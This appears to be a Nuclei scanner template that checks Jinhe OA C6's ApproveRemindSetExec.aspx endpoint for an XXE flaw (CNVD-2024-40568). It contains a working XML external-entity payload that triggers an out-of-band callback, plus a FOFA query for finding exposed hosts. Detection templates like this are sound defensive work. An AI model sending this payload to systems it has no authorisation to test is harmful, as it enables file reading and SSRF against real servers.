http:
    - matchers:
        - part: interactsh_protocol
          type: word
          words:
            - dns
      raw:
        - |
          POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
          Content-Type: application/xml

          <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://{{interactsh-url}}"> %remote;]>
id: jinheOA-C6-ApproveRemindSetExec_aspx-XXE-CNVD-2024-40568
info:
    author: Superhero
    description: |-
        fofa: app="金和网络-金和OA"
        金和OA ApproveRemindSetExec.aspx 接口处存在XML实体注入漏洞，攻击者可利用xxe漏洞获取服务器敏感数据，可读取任意文件以及ssrf攻击，存在一定的安全隐患。
    name: 金和OA C6 ApproveRemindSetExec.aspx XXE漏洞(CNVD-2024-40568)
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247488861&idx=1&sn=62a854c0c01706d6223c2c55b201de70&chksm=c267a06ef5102978af9ff794acb4ca453ad05ab6154736b9139d1b64e4e0dc8b489fb9205038&token=385896921&lang=zh_CN#rd
    severity: high
    tags:
        - XXE
        - 金和oa
        - 金和网络-金和OA
